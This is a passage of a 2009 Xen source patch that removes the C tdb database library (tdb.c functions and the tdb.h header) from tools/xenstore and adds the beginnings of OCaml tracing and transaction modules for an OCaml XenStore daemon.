-               /* No previous element: do normal find, and lock record */
-               tdb->travlocks.off = tdb_find_lock_hash(tdb, oldkey, 
tdb->hash_fn(&oldkey), F_WRLCK, &rec);
-               if (!tdb->travlocks.off)
-                       return tdb_null;
-               tdb->travlocks.hash = BUCKET(rec.full_hash);
-               if (lock_record(tdb, tdb->travlocks.off) != 0) {
-                       TDB_LOG((tdb, 0, "tdb_nextkey: lock_record failed 
(%s)!\n", strerror(errno)));
-                       return tdb_null;
-               }
-       }
-       oldhash = tdb->travlocks.hash;
-
-       /* Grab next record: locks chain and returned record,
-          unlocks old record */
-       if (tdb_next_lock(tdb, &tdb->travlocks, &rec) > 0) {
-               key.dsize = rec.key_len;
-               key.dptr = tdb_alloc_read(tdb, tdb->travlocks.off+sizeof(rec),
-                                         key.dsize);
-               /* Unlock the chain of this new record */
-               if (tdb_unlock(tdb, tdb->travlocks.hash, F_WRLCK) != 0)
-                       TDB_LOG((tdb, 0, "tdb_nextkey: WARNING tdb_unlock 
failed!\n"));
-       }
-       /* Unlock the chain of old record */
-       if (tdb_unlock(tdb, BUCKET(oldhash), F_WRLCK) != 0)
-               TDB_LOG((tdb, 0, "tdb_nextkey: WARNING tdb_unlock failed!\n"));
-       return key;
-}
-
-/* delete an entry in the database given a key */
-static int tdb_delete_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash)
-{
-       tdb_off rec_ptr;
-       struct list_struct rec;
-       int ret;
-
-       if (!(rec_ptr = tdb_find_lock_hash(tdb, key, hash, F_WRLCK, &rec)))
-               return -1;
-       ret = do_delete(tdb, rec_ptr, &rec);
-       if (tdb_unlock(tdb, BUCKET(rec.full_hash), F_WRLCK) != 0)
-               TDB_LOG((tdb, 0, "tdb_delete: WARNING tdb_unlock failed!\n"));
-       return ret;
-}
-
-int tdb_delete(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       uint32_t hash = tdb->hash_fn(&key);
-       return tdb_delete_hash(tdb, key, hash);
-}
-
-/* store an element in the database, replacing any existing element
-   with the same key 
-
-   return 0 on success, -1 on failure
-*/
-int tdb_store(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA dbuf, int flag)
-{
-       struct list_struct rec;
-       uint32_t hash;
-       tdb_off rec_ptr;
-       char *p = NULL;
-       int ret = 0;
-
-       /* find which hash bucket it is in */
-       hash = tdb->hash_fn(&key);
-       if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1)
-               return -1;
-
-       /* check for it existing, on insert. */
-       if (flag == TDB_INSERT) {
-               if (tdb_exists_hash(tdb, key, hash)) {
-                       tdb->ecode = TDB_ERR_EXISTS;
-                       goto fail;
-               }
-       } else {
-               /* first try in-place update, on modify or replace. */
-               if (tdb_update_hash(tdb, key, hash, dbuf) == 0)
-                       goto out;
-               if (tdb->ecode == TDB_ERR_NOEXIST &&
-                   flag == TDB_MODIFY) {
-                       /* if the record doesn't exist and we are in TDB_MODIFY 
mode then
-                        we should fail the store */
-                       goto fail;
-               }
-       }
-       /* reset the error code potentially set by the tdb_update() */
-       tdb->ecode = TDB_SUCCESS;
-
-       /* delete any existing record - if it doesn't exist we don't
-           care.  Doing this first reduces fragmentation, and avoids
-           coalescing with `allocated' block before it's updated. */
-       if (flag != TDB_INSERT)
-               tdb_delete_hash(tdb, key, hash);
-
-       /* Copy key+value *before* allocating free space in case malloc
-          fails and we are left with a dead spot in the tdb. */
-
-       if (!(p = (char *)talloc_size(tdb, key.dsize + dbuf.dsize))) {
-               tdb->ecode = TDB_ERR_OOM;
-               goto fail;
-       }
-
-       memcpy(p, key.dptr, key.dsize);
-       if (dbuf.dsize)
-               memcpy(p+key.dsize, dbuf.dptr, dbuf.dsize);
-
-       /* we have to allocate some space */
-       if (!(rec_ptr = tdb_allocate(tdb, key.dsize + dbuf.dsize, &rec)))
-               goto fail;
-
-       /* Read hash top into next ptr */
-       if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec.next) == -1)
-               goto fail;
-
-       rec.key_len = key.dsize;
-       rec.data_len = dbuf.dsize;
-       rec.full_hash = hash;
-       rec.magic = TDB_MAGIC;
-
-       /* write out and point the top of the hash chain at it */
-       if (rec_write(tdb, rec_ptr, &rec) == -1
-           || tdb_write(tdb, rec_ptr+sizeof(rec), p, key.dsize+dbuf.dsize)==-1
-           || ofs_write(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) {
-               /* Need to tdb_unallocate() here */
-               goto fail;
-       }
- out:
-       SAFE_FREE(p); 
-       tdb_unlock(tdb, BUCKET(hash), F_WRLCK);
-       return ret;
-fail:
-       ret = -1;
-       goto out;
-}
-
-/* Attempt to append data to an entry in place - this only works if the new 
data size
-   is <= the old data size and the key exists.
-   on failure return -1. Record must be locked before calling.
-*/
-static int tdb_append_inplace(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, 
TDB_DATA new_dbuf)
-{
-       struct list_struct rec;
-       tdb_off rec_ptr;
-
-       /* find entry */
-       if (!(rec_ptr = tdb_find(tdb, key, hash, &rec)))
-               return -1;
-
-       /* Append of 0 is always ok. */
-       if (new_dbuf.dsize == 0)
-               return 0;
-
-       /* must be long enough for key, old data + new data and tailer */
-       if (rec.rec_len < key.dsize + rec.data_len + new_dbuf.dsize + 
sizeof(tdb_off)) {
-               /* No room. */
-               tdb->ecode = TDB_SUCCESS; /* Not really an error */
-               return -1;
-       }
-
-       if (tdb_write(tdb, rec_ptr + sizeof(rec) + rec.key_len + rec.data_len,
-                     new_dbuf.dptr, new_dbuf.dsize) == -1)
-               return -1;
-
-       /* update size */
-       rec.data_len += new_dbuf.dsize;
-       return rec_write(tdb, rec_ptr, &rec);
-}
-
-/* Append to an entry. Create if not exist. */
-
-int tdb_append(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA new_dbuf)
-{
-       struct list_struct rec;
-       uint32_t hash;
-       tdb_off rec_ptr;
-       char *p = NULL;
-       int ret = 0;
-       size_t new_data_size = 0;
-
-       /* find which hash bucket it is in */
-       hash = tdb->hash_fn(&key);
-       if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1)
-               return -1;
-
-       /* first try in-place. */
-       if (tdb_append_inplace(tdb, key, hash, new_dbuf) == 0)
-               goto out;
-
-       /* reset the error code potentially set by the tdb_append_inplace() */
-       tdb->ecode = TDB_SUCCESS;
-
-       /* find entry */
-       if (!(rec_ptr = tdb_find(tdb, key, hash, &rec))) {
-               if (tdb->ecode != TDB_ERR_NOEXIST)
-                       goto fail;
-
-               /* Not found - create. */
-
-               ret = tdb_store(tdb, key, new_dbuf, TDB_INSERT);
-               goto out;
-       }
-
-       new_data_size = rec.data_len + new_dbuf.dsize;
-
-       /* Copy key+old_value+value *before* allocating free space in case 
malloc
-          fails and we are left with a dead spot in the tdb. */
-
-       if (!(p = (char *)talloc_size(tdb, key.dsize + new_data_size))) {
-               tdb->ecode = TDB_ERR_OOM;
-               goto fail;
-       }
-
-       /* Copy the key in place. */
-       memcpy(p, key.dptr, key.dsize);
-
-       /* Now read the old data into place. */
-       if (rec.data_len &&
-               tdb_read(tdb, rec_ptr + sizeof(rec) + rec.key_len, p + 
key.dsize, rec.data_len, 0) == -1)
-                       goto fail;
-
-       /* Finally append the new data. */
-       if (new_dbuf.dsize)
-               memcpy(p+key.dsize+rec.data_len, new_dbuf.dptr, new_dbuf.dsize);
-
-       /* delete any existing record - if it doesn't exist we don't
-           care.  Doing this first reduces fragmentation, and avoids
-           coalescing with `allocated' block before it's updated. */
-
-       tdb_delete_hash(tdb, key, hash);
-
-       if (!(rec_ptr = tdb_allocate(tdb, key.dsize + new_data_size, &rec)))
-               goto fail;
-
-       /* Read hash top into next ptr */
-       if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec.next) == -1)
-               goto fail;
-
-       rec.key_len = key.dsize;
-       rec.data_len = new_data_size;
-       rec.full_hash = hash;
-       rec.magic = TDB_MAGIC;
-
-       /* write out and point the top of the hash chain at it */
-       if (rec_write(tdb, rec_ptr, &rec) == -1
-           || tdb_write(tdb, rec_ptr+sizeof(rec), p, 
key.dsize+new_data_size)==-1
-           || ofs_write(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) {
-               /* Need to tdb_unallocate() here */
-               goto fail;
-       }
-
- out:
-       SAFE_FREE(p); 
-       tdb_unlock(tdb, BUCKET(hash), F_WRLCK);
-       return ret;
-
-fail:
-       ret = -1;
-       goto out;
-}
-
-static int tdb_already_open(dev_t device,
-                           ino_t ino)
-{
-       TDB_CONTEXT *i;
-       
-       for (i = tdbs; i; i = i->next) {
-               if (i->device == device && i->inode == ino) {
-                       return 1;
-               }
-       }
-
-       return 0;
-}
-
-/* open the database, creating it if necessary 
-
-   The open_flags and mode are passed straight to the open call on the
-   database file. A flags value of O_WRONLY is invalid. The hash size
-   is advisory, use zero for a default value.
-
-   Return is NULL on error, in which case errno is also set.  Don't 
-   try to call tdb_error or tdb_errname, just do strerror(errno).
-
-   @param name may be NULL for internal databases. */
-TDB_CONTEXT *tdb_open(const char *name, int hash_size, int tdb_flags,
-                     int open_flags, mode_t mode)
-{
-       return tdb_open_ex(name, hash_size, tdb_flags, open_flags, mode, NULL, 
NULL);
-}
-
-/* a default logging function */
-static void null_log_fn(TDB_CONTEXT *tdb __attribute__((unused)),
-                       int level __attribute__((unused)),
-                       const char *fmt __attribute__((unused)), ...)
-{
-}
-
-
-TDB_CONTEXT *tdb_open_ex(const char *name, int hash_size, int tdb_flags,
-                        int open_flags, mode_t mode,
-                        tdb_log_func log_fn,
-                        tdb_hash_func hash_fn)
-{
-       TDB_CONTEXT *tdb;
-       struct stat st;
-       int rev = 0, locked = 0;
-       uint8_t *vp;
-       uint32_t vertest;
-
-       if (!(tdb = talloc_zero(name, TDB_CONTEXT))) {
-               /* Can't log this */
-               errno = ENOMEM;
-               goto fail;
-       }
-       tdb->fd = -1;
-       tdb->name = NULL;
-       tdb->map_ptr = NULL;
-       tdb->flags = tdb_flags;
-       tdb->open_flags = open_flags;
-       tdb->log_fn = log_fn?log_fn:null_log_fn;
-       tdb->hash_fn = hash_fn ? hash_fn : default_tdb_hash;
-
-       if ((open_flags & O_ACCMODE) == O_WRONLY) {
-               TDB_LOG((tdb, 0, "tdb_open_ex: can't open tdb %s write-only\n",
-                        name));
-               errno = EINVAL;
-               goto fail;
-       }
-       
-       if (hash_size == 0)
-               hash_size = DEFAULT_HASH_SIZE;
-       if ((open_flags & O_ACCMODE) == O_RDONLY) {
-               tdb->read_only = 1;
-               /* read only databases don't do locking or clear if first */
-               tdb->flags |= TDB_NOLOCK;
-               tdb->flags &= ~TDB_CLEAR_IF_FIRST;
-       }
-
-       /* internal databases don't mmap or lock, and start off cleared */
-       if (tdb->flags & TDB_INTERNAL) {
-               tdb->flags |= (TDB_NOLOCK | TDB_NOMMAP);
-               tdb->flags &= ~TDB_CLEAR_IF_FIRST;
-               if (tdb_new_database(tdb, hash_size) != 0) {
-                       TDB_LOG((tdb, 0, "tdb_open_ex: tdb_new_database 
failed!"));
-                       goto fail;
-               }
-               goto internal;
-       }
-
-       if ((tdb->fd = open(name, open_flags, mode)) == -1) {
-               TDB_LOG((tdb, 5, "tdb_open_ex: could not open file %s: %s\n",
-                        name, strerror(errno)));
-               goto fail;      /* errno set by open(2) */
-       }
-
-       /* ensure there is only one process initialising at once */
-       if (tdb_brlock(tdb, GLOBAL_LOCK, F_WRLCK, F_SETLKW, 0) == -1) {
-               TDB_LOG((tdb, 0, "tdb_open_ex: failed to get global lock on %s: 
%s\n",
-                        name, strerror(errno)));
-               goto fail;      /* errno set by tdb_brlock */
-       }
-
-       /* we need to zero database if we are the only one with it open */
-       if ((tdb_flags & TDB_CLEAR_IF_FIRST) &&
-               (locked = (tdb_brlock(tdb, ACTIVE_LOCK, F_WRLCK, F_SETLK, 0) == 
0))) {
-               open_flags |= O_CREAT;
-               if (ftruncate(tdb->fd, 0) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_open_ex: "
-                                "failed to truncate %s: %s\n",
-                                name, strerror(errno)));
-                       goto fail; /* errno set by ftruncate */
-               }
-       }
-
-       if (read(tdb->fd, &tdb->header, sizeof(tdb->header)) != 
sizeof(tdb->header)
-           || strcmp(tdb->header.magic_food, TDB_MAGIC_FOOD) != 0
-           || (tdb->header.version != TDB_VERSION
-               && !(rev = (tdb->header.version==TDB_BYTEREV(TDB_VERSION))))) {
-               /* its not a valid database - possibly initialise it */
-               if (!(open_flags & O_CREAT) || tdb_new_database(tdb, hash_size) 
== -1) {
-                       errno = EIO; /* ie bad format or something */
-                       goto fail;
-               }
-               rev = (tdb->flags & TDB_CONVERT);
-       }
-       vp = (uint8_t *)&tdb->header.version;
-       vertest = (((uint32_t)vp[0]) << 24) | (((uint32_t)vp[1]) << 16) |
-                 (((uint32_t)vp[2]) << 8) | (uint32_t)vp[3];
-       tdb->flags |= (vertest==TDB_VERSION) ? TDB_BIGENDIAN : 0;
-       if (!rev)
-               tdb->flags &= ~TDB_CONVERT;
-       else {
-               tdb->flags |= TDB_CONVERT;
-               convert(&tdb->header, sizeof(tdb->header));
-       }
-       if (fstat(tdb->fd, &st) == -1)
-               goto fail;
-
-       /* Is it already in the open list?  If so, fail. */
-       if (tdb_already_open(st.st_dev, st.st_ino)) {
-               TDB_LOG((tdb, 2, "tdb_open_ex: "
-                        "%s (%d,%d) is already open in this process\n",
-                        name, (int)st.st_dev, (int)st.st_ino));
-               errno = EBUSY;
-               goto fail;
-       }
-
-       if (!(tdb->name = (char *)talloc_strdup(tdb, name))) {
-               errno = ENOMEM;
-               goto fail;
-       }
-
-       tdb->map_size = st.st_size;
-       tdb->device = st.st_dev;
-       tdb->inode = st.st_ino;
-       tdb->locked = talloc_zero_array(tdb, struct tdb_lock_type,
-                                       tdb->header.hash_size+1);
-       if (!tdb->locked) {
-               TDB_LOG((tdb, 2, "tdb_open_ex: "
-                        "failed to allocate lock structure for %s\n",
-                        name));
-               errno = ENOMEM;
-               goto fail;
-       }
-       tdb_mmap(tdb);
-       if (locked) {
-               if (tdb_brlock(tdb, ACTIVE_LOCK, F_UNLCK, F_SETLK, 0) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_open_ex: "
-                                "failed to take ACTIVE_LOCK on %s: %s\n",
-                                name, strerror(errno)));
-                       goto fail;
-               }
-
-       }
-
-       /* We always need to do this if the CLEAR_IF_FIRST flag is set, even if
-          we didn't get the initial exclusive lock as we need to let all other
-          users know we're using it. */
-
-       if (tdb_flags & TDB_CLEAR_IF_FIRST) {
-       /* leave this lock in place to indicate it's in use */
-       if (tdb_brlock(tdb, ACTIVE_LOCK, F_RDLCK, F_SETLKW, 0) == -1)
-               goto fail;
-       }
-
-
- internal:
-       /* Internal (memory-only) databases skip all the code above to
-        * do with disk files, and resume here by releasing their
-        * global lock and hooking into the active list. */
-       if (tdb_brlock(tdb, GLOBAL_LOCK, F_UNLCK, F_SETLKW, 0) == -1)
-               goto fail;
-       tdb->next = tdbs;
-       tdbs = tdb;
-       return tdb;
-
- fail:
-       { int save_errno = errno;
-
-       if (!tdb)
-               return NULL;
-       
-       if (tdb->map_ptr) {
-               if (tdb->flags & TDB_INTERNAL)
-                       SAFE_FREE(tdb->map_ptr);
-               else
-                       tdb_munmap(tdb);
-       }
-       SAFE_FREE(tdb->name);
-       if (tdb->fd != -1)
-               if (close(tdb->fd) != 0)
-                       TDB_LOG((tdb, 5, "tdb_open_ex: failed to close tdb->fd 
on error!\n"));
-       SAFE_FREE(tdb->locked);
-       SAFE_FREE(tdb);
-       errno = save_errno;
-       return NULL;
-       }
-}
-
-/**
- * Close a database.
- *
- * @returns -1 for error; 0 for success.
- **/
-int tdb_close(TDB_CONTEXT *tdb)
-{
-       TDB_CONTEXT **i;
-       int ret = 0;
-
-       if (tdb->map_ptr) {
-               if (tdb->flags & TDB_INTERNAL)
-                       SAFE_FREE(tdb->map_ptr);
-               else
-                       tdb_munmap(tdb);
-       }
-       SAFE_FREE(tdb->name);
-       if (tdb->fd != -1)
-               ret = close(tdb->fd);
-       SAFE_FREE(tdb->locked);
-
-       /* Remove from contexts list */
-       for (i = &tdbs; *i; i = &(*i)->next) {
-               if (*i == tdb) {
-                       *i = tdb->next;
-                       break;
-               }
-       }
-
-       memset(tdb, 0, sizeof(*tdb));
-       SAFE_FREE(tdb);
-
-       return ret;
-}
-
-/* lock/unlock entire database */
-int tdb_lockall(TDB_CONTEXT *tdb)
-{
-       uint32_t i;
-
-       /* There are no locks on read-only dbs */
-       if (tdb->read_only)
-               return TDB_ERRCODE(TDB_ERR_LOCK, -1);
-       for (i = 0; i < tdb->header.hash_size; i++) 
-               if (tdb_lock(tdb, i, F_WRLCK))
-                       break;
-
-       /* If error, release locks we have... */
-       if (i < tdb->header.hash_size) {
-               uint32_t j;
-
-               for ( j = 0; j < i; j++)
-                       tdb_unlock(tdb, j, F_WRLCK);
-               return TDB_ERRCODE(TDB_ERR_NOLOCK, -1);
-       }
-
-       return 0;
-}
-void tdb_unlockall(TDB_CONTEXT *tdb)
-{
-       uint32_t i;
-       for (i=0; i < tdb->header.hash_size; i++)
-               tdb_unlock(tdb, i, F_WRLCK);
-}
-
-/* lock/unlock one hash chain. This is meant to be used to reduce
-   contention - it cannot guarantee how many records will be locked */
-int tdb_chainlock(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       return tdb_lock(tdb, BUCKET(tdb->hash_fn(&key)), F_WRLCK);
-}
-
-int tdb_chainunlock(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       return tdb_unlock(tdb, BUCKET(tdb->hash_fn(&key)), F_WRLCK);
-}
-
-int tdb_chainlock_read(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       return tdb_lock(tdb, BUCKET(tdb->hash_fn(&key)), F_RDLCK);
-}
-
-int tdb_chainunlock_read(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       return tdb_unlock(tdb, BUCKET(tdb->hash_fn(&key)), F_RDLCK);
-}
-
-
-/* register a loging function */
-void tdb_logging_function(TDB_CONTEXT *tdb, void (*fn)(TDB_CONTEXT *, int , 
const char *, ...))
-{
-       tdb->log_fn = fn?fn:null_log_fn;
-}
-
-
-/* reopen a tdb - this can be used after a fork to ensure that we have an 
independent
-   seek pointer from our parent and to re-establish locks */
-int tdb_reopen(TDB_CONTEXT *tdb)
-{
-       struct stat st;
-
-       if (tdb->flags & TDB_INTERNAL)
-               return 0; /* Nothing to do. */
-       if (tdb_munmap(tdb) != 0) {
-               TDB_LOG((tdb, 0, "tdb_reopen: munmap failed (%s)\n", 
strerror(errno)));
-               goto fail;
-       }
-       if (close(tdb->fd) != 0)
-               TDB_LOG((tdb, 0, "tdb_reopen: WARNING closing tdb->fd 
failed!\n"));
-       tdb->fd = open(tdb->name, tdb->open_flags & ~(O_CREAT|O_TRUNC), 0);
-       if (tdb->fd == -1) {
-               TDB_LOG((tdb, 0, "tdb_reopen: open failed (%s)\n", 
strerror(errno)));
-               goto fail;
-       }
-       if (fstat(tdb->fd, &st) != 0) {
-               TDB_LOG((tdb, 0, "tdb_reopen: fstat failed (%s)\n", 
strerror(errno)));
-               goto fail;
-       }
-       if (st.st_ino != tdb->inode || st.st_dev != tdb->device) {
-               TDB_LOG((tdb, 0, "tdb_reopen: file dev/inode has changed!\n"));
-               goto fail;
-       }
-       tdb_mmap(tdb);
-       if ((tdb->flags & TDB_CLEAR_IF_FIRST) && (tdb_brlock(tdb, ACTIVE_LOCK, 
F_RDLCK, F_SETLKW, 0) == -1)) {
-               TDB_LOG((tdb, 0, "tdb_reopen: failed to obtain active lock\n"));
-               goto fail;
-       }
-
-       return 0;
-
-fail:
-       tdb_close(tdb);
-       return -1;
-}
-
-/* Not general: only works if single writer. */
-TDB_CONTEXT *tdb_copy(TDB_CONTEXT *tdb, const char *outfile)
-{
-       int fd, saved_errno;
-       TDB_CONTEXT *copy;
-
-       fd = open(outfile, O_TRUNC|O_CREAT|O_WRONLY, 0640);
-       if (fd < 0)
-               return NULL;
-       if (tdb->map_ptr) {
-               if (write(fd,tdb->map_ptr,tdb->map_size) != (int)tdb->map_size)
-                       goto fail;
-       } else {
-               char buf[65536];
-               int r;
-
-               lseek(tdb->fd, 0, SEEK_SET);
-               while ((r = read(tdb->fd, buf, sizeof(buf))) > 0) {
-                       if (write(fd, buf, r) != r)
-                               goto fail;
-               }
-               if (r < 0)
-                       goto fail;
-       }
-       copy = tdb_open(outfile, 0, 0, O_RDWR, 0);
-       if (!copy)
-               goto fail;
-       close(fd);
-       return copy;
-
-fail:
-       saved_errno = errno;
-       close(fd);
-       unlink(outfile);
-       errno = saved_errno;
-       return NULL;
-}
-
-/* reopen all tdb's */
-int tdb_reopen_all(void)
-{
-       TDB_CONTEXT *tdb;
-
-       for (tdb=tdbs; tdb; tdb = tdb->next) {
-               /* Ensure no clear-if-first. */
-               tdb->flags &= ~TDB_CLEAR_IF_FIRST;
-               if (tdb_reopen(tdb) != 0)
-                       return -1;
-       }
-
-       return 0;
-}
diff -r 10a8fae412c5 tools/xenstore/tdb.h
--- a/tools/xenstore/tdb.h      Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,157 +0,0 @@
-#ifndef __TDB_H__
-#define __TDB_H__
-
-/* 
-   Unix SMB/CIFS implementation.
-
-   trivial database library
-
-   Copyright (C) Andrew Tridgell 1999-2004
-   
-     ** NOTE! The following LGPL license applies to the tdb
-     ** library. This does NOT imply that all of Samba is released
-     ** under the LGPL
-   
-   This library is free software; you can redistribute it and/or
-   modify it under the terms of the GNU Lesser General Public
-   License as published by the Free Software Foundation; either
-   version 2 of the License, or (at your option) any later version.
-
-   This library is distributed in the hope that it will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-   Lesser General Public License for more details.
-
-   You should have received a copy of the GNU Lesser General Public
-   License along with this library; if not, write to the Free Software
-   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-
-/* flags to tdb_store() */
-#define TDB_REPLACE 1
-#define TDB_INSERT 2
-#define TDB_MODIFY 3
-
-/* flags for tdb_open() */
-#define TDB_DEFAULT 0 /* just a readability place holder */
-#define TDB_CLEAR_IF_FIRST 1
-#define TDB_INTERNAL 2 /* don't store on disk */
-#define TDB_NOLOCK   4 /* don't do any locking */
-#define TDB_NOMMAP   8 /* don't use mmap */
-#define TDB_CONVERT 16 /* convert endian (internal use) */
-#define TDB_BIGENDIAN 32 /* header is big-endian (internal use) */
-
-#define TDB_ERRCODE(code, ret) ((tdb->ecode = (code)), ret)
-
-/* error codes */
-enum TDB_ERROR {TDB_SUCCESS=0, TDB_ERR_CORRUPT, TDB_ERR_IO, TDB_ERR_LOCK, 
-               TDB_ERR_OOM, TDB_ERR_EXISTS, TDB_ERR_NOLOCK, 
TDB_ERR_LOCK_TIMEOUT,
-               TDB_ERR_NOEXIST};
-
-#ifndef uint32_t
-#define uint32_t unsigned
-#endif
-
-typedef struct TDB_DATA {
-       char *dptr;
-       size_t dsize;
-} TDB_DATA;
-
-typedef uint32_t tdb_len;
-typedef uint32_t tdb_off;
-
-/* this is stored at the front of every database */
-struct tdb_header {
-       char magic_food[32]; /* for /etc/magic */
-       uint32_t version; /* version of the code */
-       uint32_t hash_size; /* number of hash entries */
-       tdb_off rwlocks;
-       tdb_off reserved[31];
-};
-
-struct tdb_lock_type {
-       uint32_t count;
-       uint32_t ltype;
-};
-
-struct tdb_traverse_lock {
-       struct tdb_traverse_lock *next;
-       uint32_t off;
-       uint32_t hash;
-};
-
-#ifndef PRINTF_ATTRIBUTE
-#define PRINTF_ATTRIBUTE(a,b)
-#endif
-
-/* this is the context structure that is returned from a db open */
-typedef struct tdb_context {
-       char *name; /* the name of the database */
-       void *map_ptr; /* where it is currently mapped */
-       int fd; /* open file descriptor for the database */
-       tdb_len map_size; /* how much space has been mapped */
-       int read_only; /* opened read-only */
-       struct tdb_lock_type *locked; /* array of chain locks */
-       enum TDB_ERROR ecode; /* error code for last tdb error */
-       struct tdb_header header; /* a cached copy of the header */
-       uint32_t flags; /* the flags passed to tdb_open */
-       struct tdb_traverse_lock travlocks; /* current traversal locks */
-       struct tdb_context *next; /* all tdbs to avoid multiple opens */
-       dev_t device;   /* uniquely identifies this tdb */
-       ino_t inode;    /* uniquely identifies this tdb */
-       void (*log_fn)(struct tdb_context *tdb, int level, const char *, ...) 
PRINTF_ATTRIBUTE(3,4); /* logging function */
-       uint32_t (*hash_fn)(TDB_DATA *key);
-       int open_flags; /* flags used in the open - needed by reopen */
-} TDB_CONTEXT;
-
-typedef int (*tdb_traverse_func)(TDB_CONTEXT *, TDB_DATA, TDB_DATA, void *);
-typedef void (*tdb_log_func)(TDB_CONTEXT *, int , const char *, ...);
-typedef uint32_t (*tdb_hash_func)(TDB_DATA *key);
-
-TDB_CONTEXT *tdb_open(const char *name, int hash_size, int tdb_flags,
-                     int open_flags, mode_t mode);
-TDB_CONTEXT *tdb_open_ex(const char *name, int hash_size, int tdb_flags,
-                        int open_flags, mode_t mode,
-                        tdb_log_func log_fn,
-                        tdb_hash_func hash_fn);
-
-int tdb_reopen(TDB_CONTEXT *tdb);
-int tdb_reopen_all(void);
-void tdb_logging_function(TDB_CONTEXT *tdb, tdb_log_func);
-enum TDB_ERROR tdb_error(TDB_CONTEXT *tdb);
-const char *tdb_errorstr(TDB_CONTEXT *tdb);
-TDB_DATA tdb_fetch(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_delete(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_store(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA dbuf, int flag);
-int tdb_append(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA new_dbuf);
-int tdb_close(TDB_CONTEXT *tdb);
-TDB_DATA tdb_firstkey(TDB_CONTEXT *tdb);
-TDB_DATA tdb_nextkey(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_traverse(TDB_CONTEXT *tdb, tdb_traverse_func fn, void *);
-int tdb_exists(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_lockall(TDB_CONTEXT *tdb);
-void tdb_unlockall(TDB_CONTEXT *tdb);
-
-/* Low level locking functions: use with care */
-int tdb_chainlock(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_chainunlock(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_chainlock_read(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_chainunlock_read(TDB_CONTEXT *tdb, TDB_DATA key);
-TDB_CONTEXT *tdb_copy(TDB_CONTEXT *tdb, const char *outfile);
-
-/* Debug functions. Not used in production. */
-void tdb_dump_all(TDB_CONTEXT *tdb);
-int tdb_printfreelist(TDB_CONTEXT *tdb);
-
-extern TDB_DATA tdb_null;
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* tdb.h */
diff -r 10a8fae412c5 tools/xenstore/trace.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/trace.ml   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,41 @@
+(* 
+    Tracing for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Trace file descriptor *)
+let traceout = ref None
+
+(* Output a trace string *)
+let out str =
+  match !traceout with
+    | Some channel -> Printf.fprintf channel "%s" str; flush channel
+    | None -> ()
+
+(* Trace a creation *)
+let create data t =
+  out (Printf.sprintf "CREATE %s %d\n" t data)
+
+(* Trace a destruction *)
+let destroy data t =
+  out (Printf.sprintf "DESTROY %s %d\n" t data)
+
+(* Trace I/O *)
+let io domain_id prefix time message =
+  let message_type = Message.message_type_to_string 
message.Message.header.Message.message_type
+  and sanitised_data = Utils.sanitise_string message.Message.payload in
+  out (Printf.sprintf "%s %d %s %s (%s)\n" prefix domain_id time message_type 
sanitised_data)
diff -r 10a8fae412c5 tools/xenstore/transaction.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/transaction.ml     Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,287 @@
+(* 
+    Transactions for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+type tr =
+  {
+    domain_id : int;
+    transaction_id : int32
+  }
+
+type operation =
+  | NONE
+  | READ
+  | WRITE
+  | RM
+
+type element =
+  {
+    transaction : tr;
+    operation : operation;
+    path : string;
+    mutable modified : bool
+  }
+
+type changed_domain =
+  {
+    id : int;
+    entries : int
+  }
+
